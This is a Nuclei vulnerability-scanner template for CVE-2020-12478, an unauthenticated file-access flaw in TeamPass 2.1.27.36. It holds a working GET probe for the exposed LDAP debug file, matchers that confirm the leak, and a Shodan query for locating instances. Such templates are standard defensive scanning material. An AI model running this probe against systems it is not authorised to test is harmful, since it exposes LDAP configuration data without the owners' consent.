nuclei-templates/cves/2020/CVE-2020-12478.yaml

42 lines
1.0 KiB
YAML

id: CVE-2020-12478
info:
name: TeamPass 2.1.27.36 - Unauthenticated Access
author: arafatansari
severity: high
description: |
TeamPass 2.1.27.36 allows an unauthenticated attacker to retrieve files from the TeamPass web root. This may include backups or LDAP debug files.
reference:
- https://github.com/nilsteampassnet/TeamPass/issues/2764
- https://nvd.nist.gov/vuln/detail/CVE-2020-12478
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-12478
cwe-id: CWE-306
metadata:
shodan-query: http.html:"teampass"
verified: "true"
tags: cve,cve2020,teampass,exposure,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/files/ldap.debug.txt"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Get all LDAP params'
- type: word
part: header
words:
- "text/plain"
- type: status
status:
- 200